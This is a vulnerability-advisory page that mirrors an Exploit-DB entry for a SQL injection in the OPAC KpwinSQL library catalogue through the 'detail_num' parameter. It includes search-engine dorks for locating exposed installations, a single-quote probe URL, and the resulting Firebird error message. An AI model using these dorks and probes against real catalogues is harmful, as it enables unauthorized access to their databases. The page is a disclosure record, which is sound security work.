OPAC KpwinSQL - SQL Injection

vendor:

OPAC KpwinSQL

by:

bRpsd

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: OPAC KpwinSQL

Affected Version From: All

Affected Version To: All

Patch Exists: NO

Related CWE: N/A

CPE: a:kpsys:opac_kpwinsql

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win98SE, Me, NT, 2000, XP, 2003, Vista

2016

OPAC KpwinSQL – SQL Injection

A SQL injection vulnerability exists in OPAC KpwinSQL, which allows an attacker to inject malicious SQL queries via the 'detail_num' parameter in the 'zaznam.php' file. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Product -> OPAC KpwinSQL - SQL Injection
Date -> 6/24/2016
Author -> bRpsd
Skype: vegnox
Vendor HomePage -> http://www.kpsys.cz/
Product Download -> http://www.kpsys.cz/kpwinsql/demo.html
Product Version -> / All
SQL Version -> Firebird 1.5.3 
OS -> Win98SE, Me, NT, 2000, XP, 2003, Vista


Dork -> intitle:"WWW OPAC KpwinSQL"
Dork2 -> inurl:zaznam.php?detail_num=
Dork3 -> inurl:opacsql2_0

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


File: zanzam.php
Parameter: detail_num



Test > http://localhost:8888/zaznam.php?detail_num=1'


Response:

24-06-2016 08:52:21: localhost: CHYBA: 2 WARNING: ibase_query(): Dynamic SQL Error SQL error code = -104 Unexpected end of command - line 1, column 40 :In: "C:\wwwopac\functions.php" (Line: 5462) : URL:"/zaznam.php?detail_num=1%27"Pri zpracovani pozadavku doslo k chybe, omlouvame se ...